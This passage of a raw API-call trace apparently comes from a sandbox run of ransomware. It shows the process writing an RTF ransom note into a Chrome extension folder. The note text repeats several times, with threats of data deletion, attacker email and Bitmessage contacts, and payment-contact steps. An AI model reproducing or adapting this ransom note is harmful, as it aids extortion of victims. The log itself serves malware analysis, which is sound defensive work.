the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.626] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ed4f78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x09K\x09 ", lpUsedDefaultChar=0x0) returned 8717 [0287.626] WriteFile (in: hFile=0x284, lpBuffer=0x1ed4f78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ed4f78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0287.627] CloseHandle (hObject=0x284) returned 1 [0287.627] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\#readme_eman#.rtf")) returned 0xffffffff [0287.627] GetLastError () returned 0x2 [0287.627] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\es_419\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x284 [0287.628] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 